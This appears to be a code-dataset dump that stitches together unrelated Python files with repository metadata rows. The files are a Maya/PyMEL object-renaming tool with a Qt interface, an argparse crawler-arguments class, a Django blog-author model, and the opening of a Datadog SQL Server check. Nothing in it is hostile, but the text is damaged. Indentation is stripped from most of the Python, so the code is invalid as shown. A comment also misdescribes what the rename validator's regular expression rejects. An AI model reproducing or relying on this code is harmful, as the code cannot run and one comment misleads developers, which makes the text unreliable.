# ensure pymel nodes
name_list = pm.ls(name_list)
else:
name_list = pm.ls(selection=True)
index_start = max(0, start_number)
if '#' not in new_name:
# Give this a proper error
raise KeyError('Could not find any "#" in name.')
number_padding = new_name.count('#')
new_name_list = []
# Numeric renaming
if numeric_index:
name_replace = new_name.replace(
('#' * number_padding), '%0{pad}d'.format(pad=number_padding))
index = index_start
for i in name_list:
i.rename(name_replace % index)
new_name_list.append(i.name())
index += 1
# Alphanumeric renaming
else:
name_replace = new_name.replace(('#' * number_padding), '%s')
# If index is not 0, the index will be changed to start letters at
# appropriate alphanumeric count
if index_start > 0:
index = index_start
else:
index = 1
if len(name_list) > 26:
pass
# index[27] == 'aa'
letter_index = None
overlap_count = 0
for i in name_list:
# '%' here is the modulo operator (remainder), not string substitution
continuous_index = index % 27
if continuous_index < index:
overlap_count = overlap_count + 1
letter_index = LETTERS_INDEX[overlap_count]
index = 1
if letter_index:
if upper_case:
alpha_index = letter_index + LETTERS_INDEX[index]
else:
alpha_index = letter_index.lower() \
+ str(LETTERS_INDEX[index]).lower()
else:
if upper_case:
alpha_index = LETTERS_INDEX[index]
else:
alpha_index = str(LETTERS_INDEX[index]).lower()
i.rename(name_replace % alpha_index)
new_name_list.append(i.name())
index += 1
# After indexes are all named, check if last object should be an 'end'
if end_name:
name_parts = new_name.split('#')
end_name = '{pre}END{post}'.format(pre=name_parts[0], post=name_parts[-1])
endNode = pm.ls(new_name_list[-1])[0]
endNode.rename(end_name)
new_name_list[-1] = endNode.name()
return new_name_list
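# Usage sketch (the name pattern is an assumption for illustration): rename the
# current selection to Arm_L_joint_01_JNT ... Arm_L_joint_END_JNT, where '##'
# becomes the zero-padded index and the last node gets the 'END' marker.
def _example_list_rename():
    return list_renamer('Arm_L_joint_##_JNT', numeric_index=True,
                        start_number=1, end_name=True,
                        name_list=pm.ls(selection=True))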
# TODO: add/replace/remove changed to method, made required
# TODO: name_list made required
def set_prefix(input_prefix='', add=False, replace=False, remove=False,
name_list=[]):
"""
Prefix setting tool. Allows for a prefix to be added, replaced, or removed
based on user input. Users must declare one of the Procedure Type Arguments
to be True, and leave the other two as False for the function to run.
By default it works on the current selection, but it can take a list
parameter when called from larger tools and functions.
Args:
input_prefix (str): Assign the string value to add as a prefix.
Procedure Type Arguments:
add (bool): Assign the function to add a new prefix
replace (bool): Assign the function to replace an existing prefix
remove (bool): Assign the function to remove an existing prefix.
name_list (list[str]): Allows for a provided list to be performed on.
Only works if selection flag is False.
"""
if (add and replace) or (add and remove) or (replace and remove):
raise KeyError('Can only set one type flag at a time! Use only one of'
' the following: add, replace, remove.')
if not add and not replace and not remove:
raise KeyError('No argument specified for the function to perform! Set a '
'value of True to one of the following: add, replace, '
'remove.')
if name_list:
# ensure pymel nodes
name_list = pm.ls(name_list)
else:
name_list = pm.ls(selection=True)
name_return_list = []
if input_prefix.endswith('_'):
input_prefix = input_prefix[:-1]
if add:
if input_prefix == '':
raise KeyError('No prefix given!')
for i in name_list:
short_i = get_short_name(i)
if i.startswith('_'):
i.rename('%s_%s' % (input_prefix, i[1:]))
else:
i.rename('%s_%s' % (input_prefix, short_i))
name_return_list.append(i.name())
return name_return_list
if replace:
if input_prefix == '':
raise KeyError('No prefix given!')
for obj in name_list:
if obj.startswith('_'):
obj.rename(input_prefix + obj)
else:
name_parts = obj.split('_')
obj.rename('_'.join([input_prefix] + name_parts[1:]))
name_return_list.append(obj.name())
return name_return_list
if remove:
for obj in name_list:
if obj.startswith('_'):
obj.rename(obj[1:])
name_return_list.append(obj.name())
else:
name_parts = obj.split('_')
obj.rename('_'.join(name_parts[1:]))
name_return_list.append(obj.name())
return name_return_list
# TODO: add/replace/remove changed to method, made required
# TODO: name_list made required
def set_suffix(input_suffix, add=True, replace=False, remove=False,
name_list=[]):
"""
Suffix setting tool. Allows for a suffix to be added, replaced, or removed
based on user input. Users must declare one of the Procedure Type Arguments
to be True, and leave the other two as False for the function to run.
By default it works on the current selection, but it can take a list
parameter when called from larger tools and functions.
Args:
input_suffix (str): Assign the string value to add as a suffix.
Procedure Type Arguments:
add (bool): Assign the function to add a new suffix
replace (bool): Assign the function to replace an existing suffix
remove (bool): Assign the function to remove an existing suffix.
name_list (list[str]): Allows for a provided list to be performed on.
Only works if selection flag is False.
"""
if (add and replace) or (add and remove) or (replace and remove):
pm.error('Can only set one type flag at a time! Use only one of'
' the following: add, replace, remove.')
if not add and not replace and not remove:
pm.error('No argument specified for the function to perform! Set a '
'value of True to one of the following: add, replace, '
'remove.')
if name_list:
# ensure pymel nodes
name_list = pm.ls(name_list)
else:
name_list = pm.ls(selection=True)
name_return_list = []
if input_suffix.startswith('_'):
input_suffix = input_suffix[1:]
if add:
if input_suffix == '':
raise KeyError('No suffix given!')
for obj in name_list:
if obj.endswith('_'):
obj.rename('%s%s' % (obj, input_suffix))
else:
obj.rename('%s_%s' % (obj, input_suffix))
name_return_list.append(obj.name())
return name_return_list
if replace:
if input_suffix == '':
raise KeyError('No suffix given!')
for obj in name_list:
if obj.endswith('_'):
obj.rename('%s%s' % (obj, input_suffix))
else:
name_parts = obj.split('_')
obj.rename('_'.join(name_parts[:-1] + [input_suffix]))
name_return_list.append(obj.name())
return name_return_list
if remove:
for obj in name_list:
if obj.endswith('_'):
obj.rename(obj[:-1])
name_return_list.append(obj.name())
else:
name_parts = obj.split('_')
obj.rename('_'.join(name_parts[:-1]))
name_return_list.append(obj.name())
return name_return_list
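# Usage sketch for the two helpers above (prefix/suffix values are illustrative
# assumptions): tag the selection with a side prefix and a node-type suffix.
def _example_prefix_suffix():
    renamed = set_prefix('L', add=True, name_list=pm.ls(selection=True))
    return set_suffix('CTL', add=True, name_list=renamed)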
# Make this work, long and short names cause hell
def search_replace_name(search_input, replace_output, hierarchy=False,
input_objects=[]):
"""
Python equivalent of the mel searchReplaceNames procedure. Created to work
with GUIs and python-written scripts.
Args:
search_input (str): String to search for that will be replaced.
replace_output (str): String used to replace the input string.
hierarchy (bool): Declare the range/scope of the procedure to use all
objects in hierarchy instead of just selection.
input_objects (list[str]): Allows the function to work on a provided
list. If nothing given, selection is assumed.
"""
name_return_list = []
if input_objects:
# ensure pymel nodes
input_objects = pm.ls(input_objects)
else:
input_objects = pm.ls(selection=True)
if not hierarchy:
for obj in input_objects:
if search_input in obj.name():
obj.rename(obj.name().replace(search_input, replace_output))
name_return_list.append(obj.name())
else:
hierarchyNodes = []
for obj in input_objects:
hierarchyNodes.extend(obj.getChildren(allDescendents=True))
hierarchyNodes.extend(input_objects)
for obj in hierarchyNodes:
if search_input in obj.name():
obj.rename(obj.name().replace(search_input, replace_output))
name_return_list.append(obj.name())
return name_return_list
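# Usage sketch (the search strings are assumptions): swap every 'tmp_' marker
# for 'final_' across the selected hierarchy.
# search_replace_name('tmp_', 'final_', hierarchy=True)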
# Make input_objects required?
def clear_end_digits(input_objects=[]):
name_return_list = []
if input_objects:
# ensure pymel nodes
input_objects = pm.ls(input_objects)
else:
input_objects = pm.ls(selection=True)
for obj in input_objects:
try:
int(obj.name()[-1])
except ValueError:
continue
if pm.objExists(obj.name()[:-1]):
pm.warning('While removing end digits, another object with name '
'"{}" was found. Function may have failed to remove '
'end digits properly.'.format(obj.name()[:-1]))
obj.rename(obj.name()[:-1])
name_return_list.append(obj.name())
return name_return_list
class NamingWidget(QtWidgets.QFrame):
def __init__(self):
QtWidgets.QFrame.__init__(self)
self.setWindowFlags(QtCore.Qt.WindowStaysOnTopHint)
self.setWindowTitle('Name Tool')
self.setMinimumHeight(285)
self.setMinimumWidth(320)
self.setLayout(QtWidgets.QVBoxLayout())
self.layout().setContentsMargins(5, 5, 5, 5)
self.layout().setSpacing(0)
self.layout().setAlignment(QtCore.Qt.AlignTop)
# Rename Widget
rename_widget = QtWidgets.QWidget() # Widget holding upper name stuff
rename_widget.setLayout(QtWidgets.QVBoxLayout())
rename_widget.layout().setContentsMargins(0, 0, 0, 0)
rename_widget.layout().setSpacing(2)
rename_widget.setSizePolicy(QtWidgets.QSizePolicy.Minimum,
QtWidgets.QSizePolicy.Fixed)
self.layout().addWidget(rename_widget)
# Label Splitter
rename_splitter = Splitter.Splitter('Rename') # Custom splitter widget
rename_widget.layout().addWidget(rename_splitter)
# Rename Input
rename_text_layout = QtWidgets.QHBoxLayout()
rename_text_layout.setContentsMargins(4, 0, 4, 0)
rename_text_layout.setSpacing(2)
rename_widget.layout().addLayout(rename_text_layout)
rename_text_label = QtWidgets.QLabel('Rename: ')
self.rename_line_edit = QtWidgets.QLineEdit()
self.rename_line_edit.setPlaceholderText(
'Component_Side_objectName_##_CTL') # Grey text
rename_text_layout.addWidget(rename_text_label)
rename_text_layout.addWidget(self.rename_line_edit)
# Regular expression validator for the rename field:
# the (?!...) negative lookahead is intended to reject names that start with
# symbols such as '@', '$', '^' or '_', while [0-9a-zA-Z_#]+ accepts letters,
# digits, underscores and '#' padding characters
reg_ex = QtCore.QRegExp('^(?!@$^_)[0-9a-zA-Z_#]+')
text_validator = QtGui.QRegExpValidator(reg_ex, self.rename_line_edit)
self.rename_line_edit.setValidator(text_validator)
rename_widget.layout().addLayout(Splitter.SplitterLayout())
# AlphaNumeric Options
rename_alphanumberic_layout = QtWidgets.QHBoxLayout()
rename_alphanumberic_layout.setContentsMargins(4, 0, 4, 0)
rename_alphanumberic_layout.setSpacing(2)
rename_widget.layout().addLayout(rename_alphanumberic_layout)
rename_alphanumberic_label = QtWidgets.QLabel('Name List Method: ')
self.rename_alpha_radio = QtWidgets.QRadioButton('Alpha')
self.rename_number_radio = QtWidgets.QRadioButton('Numbers')
self.rename_number_radio.setChecked(True)
self.rename_alpha_radio.setFixedHeight(19)
rename_alphanumberic_layout.addWidget(rename_alphanumberic_label)
rename_alphanumberic_layout.addSpacerItem(
QtWidgets.QSpacerItem(5, 5, QtWidgets.QSizePolicy.Expanding)
)
rename_alphanumberic_layout.addWidget(self.rename_alpha_radio)
rename_alphanumberic_layout.addWidget(self.rename_number_radio)
# Hidden Upper/Lower Case buttons
rename_options_layout = QtWidgets.QHBoxLayout()
rename_options_layout.setContentsMargins(4, 0, 4, 0)
rename_options_layout.setSpacing(2)
rename_widget.layout().addLayout(rename_options_layout)
self.alpha_case_group = QtWidgets.QButtonGroup()
self.lower_radio = QtWidgets.QRadioButton('Lowercase')
self.upper_radio = QtWidgets.QRadioButton('Uppercase')
self.alpha_case_group.addButton(self.lower_radio)
self.alpha_case_group.addButton(self.upper_radio)
self.lower_radio.setVisible(False)
self.upper_radio.setVisible(False)
self.lower_radio.setFixedHeight(19)
self.upper_radio.setFixedHeight(19)
self.upper_radio.setChecked(True)
rename_options_layout.addWidget(self.lower_radio)
rename_options_layout.addSpacerItem(
QtWidgets.QSpacerItem(5, 5, QtWidgets.QSizePolicy.Expanding)
)
rename_options_layout.addWidget(self.upper_radio)
# Starting Number
rename_starting_number_layout = QtWidgets.QHBoxLayout()
rename_starting_number_layout.setContentsMargins(4, 0, 4, 0)
rename_starting_number_layout.setSpacing(2)
rename_widget.layout().addLayout(rename_starting_number_layout)
self.rename_start_label = QtWidgets.QLabel('Starting Number: ')
self.rename_start_number = QtWidgets.QSpinBox()
self.rename_start_number.setFixedWidth(50)
self.rename_start_number.setMinimum(0)
self.rename_start_number.setMaximum(999)
self.list_end_condition_label = QtWidgets.QLabel('End with "END":')
self.list_end_condition_checkbox = QtWidgets.QCheckBox()
rename_starting_number_layout.addWidget(self.rename_start_label)
rename_starting_number_layout.addWidget(self.rename_start_number)
rename_starting_number_layout.addSpacerItem(
QtWidgets.QSpacerItem(5, 5, QtWidgets.QSizePolicy.Expanding)
)
rename_starting_number_layout.addWidget(self.list_end_condition_label)
rename_starting_number_layout.addWidget(
self.list_end_condition_checkbox)
rename_widget.layout().addLayout(Splitter.SplitterLayout())
# Execute List Rename Button
rename_button_layout = QtWidgets.QHBoxLayout()
rename_button_layout.setContentsMargins(4, 0, 4, 0)
rename_button_layout.setSpacing(0)
rename_widget.layout().addLayout(rename_button_layout)
self.rename_label = QtWidgets.QLabel('')
rename_button = QtWidgets.QPushButton('Rename')
rename_button.setFixedHeight(20)
rename_button.setFixedWidth(55)
rename_button_layout.addWidget(self.rename_label)
rename_button_layout.addWidget(rename_button)
# Replace Widget
replace_widget = QtWidgets.QWidget() # Widget holding lower name stuff
replace_widget.setLayout(QtWidgets.QVBoxLayout())
replace_widget.layout().setContentsMargins(0, 0, 0, 0)
replace_widget.layout().setSpacing(2)
replace_widget.setSizePolicy(QtWidgets.QSizePolicy.Minimum,
QtWidgets.QSizePolicy.Fixed)
self.layout().addWidget(replace_widget)
replace_splitter = Splitter.Splitter('Find & Replace')
replace_widget.layout().addWidget(replace_splitter)
find_label = QtWidgets.QLabel('Find: ')
self.find_line_edit = QtWidgets.QLineEdit()
replace_label = QtWidgets.QLabel('Replace: ')
self.replace_line_edit = QtWidgets.QLineEdit()
find_label.setFixedWidth(55)
replace_label.setFixedWidth(55)
reg_ex = QtCore.QRegExp('[0-9a-zA-Z_]+')
text_validator = QtGui.QRegExpValidator(reg_ex, self.rename_line_edit)
self.find_line_edit.setValidator(text_validator)
self.replace_line_edit.setValidator(text_validator)
find_layout = QtWidgets.QHBoxLayout()
find_layout.setContentsMargins(4, 0, 4, 0)
find_layout.setSpacing(2)
find_layout.addWidget(find_label)
find_layout.addWidget(self.find_line_edit)
replace_widget.layout().addLayout(find_layout)
replace_layout = QtWidgets.QHBoxLayout()
replace_layout.setContentsMargins(4, 0, 4, 0)
replace_layout.setSpacing(2)
replace_layout.addWidget(replace_label)
replace_layout.addWidget(self.replace_line_edit)
replace_widget.layout().addLayout(replace_layout)
replace_widget.layout().addLayout(Splitter.SplitterLayout())
selection_layout = QtWidgets.QHBoxLayout()
selection_layout.setContentsMargins(4, 0, 4, 0)
selection_layout.setSpacing(2)
replace_widget.layout().addLayout(selection_layout)
selection_mode_label = QtWidgets.QLabel('Selection Mode: ')
self.selected_radio_button = QtWidgets.QRadioButton('Selected')
self.selected_radio_button.setFixedHeight(19)
self.selected_radio_button.setChecked(True)
self.hierarchy_radio_button = QtWidgets.QRadioButton('Hierarchy')
self.hierarchy_radio_button.setFixedHeight(19)
selection_layout.addWidget(selection_mode_label)
spacer_item = QtWidgets.QSpacerItem(5, 5,
QtWidgets.QSizePolicy.Expanding)
selection_layout.addSpacerItem(spacer_item)
selection_layout.addWidget(self.selected_radio_button)
selection_layout.addWidget(self.hierarchy_radio_button)
replace_widget.layout().addLayout(Splitter.SplitterLayout())
replace_button = QtWidgets.QPushButton('Replace')
replace_button.setFixedHeight(20)
replace_button.setFixedWidth(55)
replace_button_layout = QtWidgets.QHBoxLayout()
replace_button_layout.setContentsMargins(4, 0, 4, 0)
replace_button_layout.setSpacing(0)
replace_button_layout.setAlignment(QtCore.Qt.AlignRight)
replace_button_layout.addWidget(replace_button)
replace_widget.layout().addLayout(replace_button_layout)
# Prefix and Suffix
additions_widget = QtWidgets.QWidget()
additions_widget.setLayout(QtWidgets.QVBoxLayout())
additions_widget.layout().setContentsMargins(0, 0, 0, 0)
additions_widget.layout().setSpacing(2)
additions_widget.setSizePolicy(QtWidgets.QSizePolicy.Minimum,
QtWidgets.QSizePolicy.Fixed)
self.layout().addWidget(additions_widget)
# Label Splitter
additions_splitter = Splitter.Splitter('Prefix & Suffix')
additions_widget.layout().addWidget(additions_splitter)
prefix_layout = QtWidgets.QHBoxLayout()
prefix_layout.setContentsMargins(4, 0, 4, 0)
prefix_layout.setSpacing(2)
additions_widget.layout().addLayout(prefix_layout)
suffix_layout = QtWidgets.QHBoxLayout()
suffix_layout.setContentsMargins(4, 0, 4, 0)
suffix_layout.setSpacing(2)
additions_widget.layout().addLayout(suffix_layout)
prefix_label = QtWidgets.QLabel('Prefix:')
self.prefix_line_edit = QtWidgets.QLineEdit()
self.prefix_add_button = QtWidgets.QPushButton('+')
self.prefix_remove_button = QtWidgets.QPushButton('-')
self.prefix_replace_button = QtWidgets.QPushButton('><') # Change later
prefix_layout.addWidget(prefix_label)
prefix_layout.addWidget(self.prefix_line_edit)
prefix_layout.addWidget(self.prefix_add_button)
prefix_layout.addWidget(self.prefix_remove_button)
prefix_layout.addWidget(self.prefix_replace_button)
suffix_label = QtWidgets.QLabel('Suffix:')
self.suffix_line_edit = QtWidgets.QLineEdit()
self.suffix_add_button = QtWidgets.QPushButton('+')
self.suffix_remove_button = QtWidgets.QPushButton('-')
self.suffix_replace_button = QtWidgets.QPushButton('><') # Change later
suffix_layout.addWidget(suffix_label)
suffix_layout.addWidget(self.suffix_line_edit)
suffix_layout.addWidget(self.suffix_add_button)
suffix_layout.addWidget(self.suffix_remove_button)
suffix_layout.addWidget(self.suffix_replace_button)
prefix_label.setFixedWidth(55)
suffix_label.setFixedWidth(55)
self.prefix_add_button.setFixedWidth(25)
self.prefix_remove_button.setFixedWidth(25)
self.prefix_replace_button.setFixedWidth(25)
self.suffix_add_button.setFixedWidth(25)
self.suffix_remove_button.setFixedWidth(25)
self.suffix_replace_button.setFixedWidth(25)
additions_widget.layout().addLayout(Splitter.SplitterLayout())
# Name Cleanup
cleanup_widget = QtWidgets.QWidget()
cleanup_widget.setLayout(QtWidgets.QVBoxLayout())
cleanup_widget.layout().setContentsMargins(0, 0, 0, 0)
cleanup_widget.layout().setSpacing(2)
cleanup_widget.setSizePolicy(QtWidgets.QSizePolicy.Minimum,
QtWidgets.QSizePolicy.Fixed)
self.layout().addWidget(cleanup_widget)
# Label Splitter
cleanup_splitter = Splitter.Splitter('Cleanup')
cleanup_widget.layout().addWidget(cleanup_splitter)
cleanup_layout = QtWidgets.QHBoxLayout()
cleanup_layout.setContentsMargins(4, 0, 4, 0)
cleanup_layout.setSpacing(2)
cleanup_widget.layout().addLayout(cleanup_layout)
self.end_digits_button = QtWidgets.QPushButton('End Digits')
# Below buttons need proper functions written...-----------
self.shape_name_button = QtWidgets.QPushButton('Shape Names')
self.deformer_name_button = QtWidgets.QPushButton('Deformer Names')
cleanup_layout.addWidget(self.end_digits_button)
cleanup_layout.addWidget(self.shape_name_button)
cleanup_layout.addWidget(self.deformer_name_button)
# State Change modifiers
# Need to set the changed status of the alphanumeric radio buttons to
# influence the _toggle_rename_vis() function
self.rename_alpha_radio.clicked.connect(self._toggle_rename_vis)
self.rename_number_radio.clicked.connect(self._toggle_rename_vis)
self.lower_radio.clicked.connect(self._update_example)
self.upper_radio.clicked.connect(self._update_example)
self.rename_start_number.valueChanged.connect(self._update_example)
self.rename_line_edit.textChanged.connect(self._update_example)
rename_button.clicked.connect(self.list_rename)
replace_button.clicked.connect(self.replace_text)
self.prefix_add_button.clicked.connect(
partial(self.edit_prefix, True, False, False))
self.prefix_remove_button.clicked.connect(
partial(self.edit_prefix, False, False, True))
self.prefix_replace_button.clicked.connect(
partial(self.edit_prefix, False, True, False))
self.suffix_add_button.clicked.connect(
partial(self.edit_suffix, True, False, False))
self.suffix_remove_button.clicked.connect(
partial(self.edit_suffix, False, False, True))
self.suffix_replace_button.clicked.connect(
partial(self.edit_suffix, False, True, False))
self.end_digits_button.clicked.connect(clear_end_digits)
self._update_example()
def _toggle_rename_vis(self):
visible = self.rename_alpha_radio.isChecked()
self.lower_radio.setVisible(visible)
self.upper_radio.setVisible(visible)
self.rename_start_number.setValue(int(visible))
self.rename_start_number.setMinimum(int(visible))
def _get_rename_settings(self):
text = str(self.rename_line_edit.text()).strip()
naming_method = self.rename_number_radio.isChecked()
starting_number = self.rename_start_number.value()
upper = True
if naming_method is False:
upper = self.upper_radio.isChecked()
return text, starting_number, naming_method, upper
def _update_example(self):
example_text = ''
text, starting_number, naming_method, upper = \
self._get_rename_settings()
if not text: # text is a variable from above
self.rename_label.setText('<font color=#646464>e.g.</font>')
return
example_text += text
if not naming_method:
if upper:
if '#' in example_text:
padding = example_text.count('#')
if padding > 1:
full_pad = ''
for pad in range(padding):
full_pad += '#'
example_text = example_text.replace(full_pad, 'A')
else:
example_text = example_text.replace('#', 'A')
else:
if '#' in example_text:
padding = example_text.count('#')
if padding > 1:
full_pad = ''
for pad in range(padding):
full_pad += '#'
example_text = example_text.replace(full_pad, 'a')
else:
example_text = example_text.replace('#', 'a')
else:
if '#' in example_text:
padding = example_text.count('#')
if padding > 1:
full_pad = ''
for pad in range(padding):
full_pad += '#'
example_text = example_text.replace(
full_pad, str(starting_number).zfill(padding)
)
else:
example_text = example_text.replace(
'#', str(starting_number).zfill(padding)
)
self.rename_label.setText('<font color=#646464>e.g. %s</font>'
% example_text)
def list_rename(self):
text, starting_number, naming_method, upper = \
self._get_rename_settings()
if naming_method:
index_type = True
else:
index_type = False
if upper:
case = True
else:
case = False
ending = self.list_end_condition_checkbox.isChecked()
with UndoContext():
list_renamer(
new_name=text,
numeric_index=index_type,
start_number=starting_number,
upper_case=case,
end_name=ending
)
def replace_text(self):
find_text = str(self.find_line_edit.text()).strip()
replace_text = str(self.replace_line_edit.text()).strip()
select_scope = not(self.selected_radio_button.isChecked())
with UndoContext():
search_replace_name(
search_input=find_text,
replace_output=replace_text,
hierarchy=select_scope
)
def edit_prefix(self, add=False, replace=False, remove=False):
prefix = str(self.prefix_line_edit.text()).strip()
with UndoContext():
set_prefix(input_prefix=prefix, add=add, remove=remove, replace=replace)
def edit_suffix(self, add=False, replace=False, remove=False):
suffix = str(self.suffix_line_edit.text()).strip()
with UndoContext():
set_suffix(input_suffix=suffix, add=add, remove=remove, replace=replace)
| 38.787765
| 84
| 0.640124
|
e04a678183539878c3118fb66d4952edf20640d7
| 1,286
|
py
|
Python
|
spot/crawler/crawler_args.py
|
AbsaOSS/spot
|
314b16b7722e189de5dc50bcd1ba3434c5df1de8
|
[
"Apache-2.0"
] | 1
|
2022-01-30T06:17:11.000Z
|
2022-01-30T06:17:11.000Z
|
spot/crawler/crawler_args.py
|
AbsaOSS/spot
|
314b16b7722e189de5dc50bcd1ba3434c5df1de8
|
[
"Apache-2.0"
] | 2
|
2022-01-14T19:41:02.000Z
|
2022-02-02T16:04:49.000Z
|
spot/crawler/crawler_args.py
|
AbsaOSS/spot
|
314b16b7722e189de5dc50bcd1ba3434c5df1de8
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 ABSA Group Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import datetime
datetime_format = "%Y-%m-%dT%H:%M:%S"
class CrawlerArgs:
def __init__(self):
self.parser = argparse.ArgumentParser()
self.parser.add_argument("--min_end_date",
help=f"Retrieve apps completed after {datetime_format.replace('%', '%%')}",
type=lambda s: datetime.datetime.strptime(s, datetime_format))
self.parser.add_argument("--config_path",
help=f"Absolute path to config.ini configuration file, \
e.g. '/opt/config.ini'")
def parse_args(self, argv=None):
return self.parser.parse_args(argv)
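if __name__ == '__main__':
    # Minimal self-check of the parser above; the date and path values are
    # illustrative assumptions only.
    _args = CrawlerArgs().parse_args(
        ['--min_end_date', '2020-01-01T00:00:00',
         '--config_path', '/opt/config.ini'])
    print(_args.min_end_date, _args.config_path)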
| 37.823529
| 108
| 0.655521
|
1927d9a534ead0434e59c076d52ceeff615466c1
| 943
|
py
|
Python
|
apps/blogUserApp/models.py
|
sepmoon/django_blog_demo
|
e77bb452e9161f6749ad970e5af35ec9ff7dc7a4
|
[
"MIT"
] | null | null | null |
apps/blogUserApp/models.py
|
sepmoon/django_blog_demo
|
e77bb452e9161f6749ad970e5af35ec9ff7dc7a4
|
[
"MIT"
] | null | null | null |
apps/blogUserApp/models.py
|
sepmoon/django_blog_demo
|
e77bb452e9161f6749ad970e5af35ec9ff7dc7a4
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from datetime import datetime
from django.db import models
# Create your models here.
class BlogAuthorModel(models.Model):
"""
Blog author profile settings
"""
name = models.CharField(max_length=20, verbose_name=u"博主昵称")
author_logo = models.ImageField(verbose_name=u"博主头像", upload_to="images/author", blank=True, null=True)
author_desc = models.TextField(max_length=100, verbose_name=u"博主信息")
author_wechat = models.CharField(max_length=10, verbose_name=u"博主微信")
author_qq = models.CharField(max_length=10, verbose_name=u"博主QQ")
author_weibo = models.CharField(max_length=10, verbose_name=u"博主微博")
author_github = models.CharField(max_length=10, verbose_name=u"博主github")
add_time = models.DateTimeField(default=datetime.now, verbose_name=u"修改时间")
class Meta:
verbose_name = u"博客用户管理"
verbose_name_plural = verbose_name
def __str__(self):
return self.name
| 33.678571
| 107
| 0.722163
|
50aef9861b82f3d61aa1f87bcc7658661d353df1
| 41,124
|
py
|
Python
|
sqlserver/datadog_checks/sqlserver/sqlserver.py
|
jfmyers9/integrations-core
|
8793c784f1d5b2c9541b2dd4214dd91584793ced
|
[
"BSD-3-Clause"
] | 1
|
2021-03-24T13:00:14.000Z
|
2021-03-24T13:00:14.000Z
|
sqlserver/datadog_checks/sqlserver/sqlserver.py
|
jfmyers9/integrations-core
|
8793c784f1d5b2c9541b2dd4214dd91584793ced
|
[
"BSD-3-Clause"
] | null | null | null |
sqlserver/datadog_checks/sqlserver/sqlserver.py
|
jfmyers9/integrations-core
|
8793c784f1d5b2c9541b2dd4214dd91584793ced
|
[
"BSD-3-Clause"
] | null | null | null |
# (C) Datadog, Inc. 2018-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
'''
Check the performance counters from SQL Server
For information on how to report the metrics available in the sys.dm_os_performance_counters table see
http://blogs.msdn.com/b/psssql/archive/2013/09/23/interpreting-the-counter-values-from-sys-dm-os-performance-counters.aspx # noqa: E501
'''
from __future__ import division
from collections import defaultdict
from contextlib import contextmanager
from six import raise_from
from datadog_checks.base import AgentCheck
from datadog_checks.base.config import is_affirmative
from .utils import set_default_driver_conf
try:
import adodbapi
except ImportError:
adodbapi = None
try:
import pyodbc
except ImportError:
pyodbc = None
if adodbapi is None and pyodbc is None:
raise ImportError('adodbapi or pyodbc must be installed to use this check.')
set_default_driver_conf()
EVENT_TYPE = SOURCE_TYPE_NAME = 'sql server'
ALL_INSTANCES = 'ALL'
VALID_METRIC_TYPES = ('gauge', 'rate', 'histogram')
# Constant for SQLServer cntr_type
PERF_LARGE_RAW_BASE = 1073939712
PERF_RAW_LARGE_FRACTION = 537003264
PERF_AVERAGE_BULK = 1073874176
PERF_COUNTER_BULK_COUNT = 272696576
PERF_COUNTER_LARGE_RAWCOUNT = 65792
# Queries
COUNTER_TYPE_QUERY = '''select distinct cntr_type
from sys.dm_os_performance_counters
where counter_name = ?;'''
BASE_NAME_QUERY = (
'''select distinct counter_name
from sys.dm_os_performance_counters
where (counter_name=? or counter_name=?
or counter_name=?) and cntr_type=%s;'''
% PERF_LARGE_RAW_BASE
)
INSTANCES_QUERY = '''select instance_name
from sys.dm_os_performance_counters
where counter_name=? and instance_name!='_Total';'''
VALUE_AND_BASE_QUERY = '''select counter_name, cntr_type, cntr_value, instance_name, object_name
from sys.dm_os_performance_counters
where counter_name in (%s)
order by cntr_type;'''
DATABASE_EXISTS_QUERY = 'select name from sys.databases;'
# Performance tables
DEFAULT_PERFORMANCE_TABLE = "sys.dm_os_performance_counters"
DM_OS_WAIT_STATS_TABLE = "sys.dm_os_wait_stats"
DM_OS_MEMORY_CLERKS_TABLE = "sys.dm_os_memory_clerks"
DM_OS_VIRTUAL_FILE_STATS = "sys.dm_io_virtual_file_stats"
class SQLConnectionError(Exception):
"""
Exception raised for SQL instance connection issues
"""
pass
class SQLServer(AgentCheck):
SERVICE_CHECK_NAME = 'sqlserver.can_connect'
# FIXME: 6.x, set default to 5s (like every check)
DEFAULT_COMMAND_TIMEOUT = 30
DEFAULT_DATABASE = 'master'
DEFAULT_DRIVER = 'SQL Server'
DEFAULT_DB_KEY = 'database'
PROC_GUARD_DB_KEY = 'proc_only_if_database'
METRICS = [
('sqlserver.buffer.cache_hit_ratio', 'Buffer cache hit ratio', ''), # RAW_LARGE_FRACTION
('sqlserver.buffer.page_life_expectancy', 'Page life expectancy', ''), # LARGE_RAWCOUNT
('sqlserver.stats.batch_requests', 'Batch Requests/sec', ''), # BULK_COUNT
('sqlserver.stats.sql_compilations', 'SQL Compilations/sec', ''), # BULK_COUNT
('sqlserver.stats.sql_recompilations', 'SQL Re-Compilations/sec', ''), # BULK_COUNT
('sqlserver.stats.connections', 'User Connections', ''), # LARGE_RAWCOUNT
('sqlserver.stats.lock_waits', 'Lock Waits/sec', '_Total'), # BULK_COUNT
('sqlserver.access.page_splits', 'Page Splits/sec', ''), # BULK_COUNT
('sqlserver.stats.procs_blocked', 'Processes blocked', ''), # LARGE_RAWCOUNT
('sqlserver.buffer.checkpoint_pages', 'Checkpoint pages/sec', ''), # BULK_COUNT
]
valid_connectors = []
valid_adoproviders = ['SQLOLEDB', 'MSOLEDBSQL', 'SQLNCLI11']
default_adoprovider = 'SQLOLEDB'
if adodbapi is not None:
valid_connectors.append('adodbapi')
if pyodbc is not None:
valid_connectors.append('odbc')
valid_tables = [
DEFAULT_PERFORMANCE_TABLE,
DM_OS_WAIT_STATS_TABLE,
DM_OS_MEMORY_CLERKS_TABLE,
DM_OS_VIRTUAL_FILE_STATS,
]
def __init__(self, name, init_config, instances):
super(SQLServer, self).__init__(name, init_config, instances)
# Cache connections
self.connections = {}
self.failed_connections = {}
self.instances_metrics = {}
self.instances_per_type_metrics = defaultdict(dict)
self.existing_databases = None
self.do_check = {}
self.proc_type_mapping = {'gauge': self.gauge, 'rate': self.rate, 'histogram': self.histogram}
self.adoprovider = self.default_adoprovider
self.connector = init_config.get('connector', 'adodbapi')
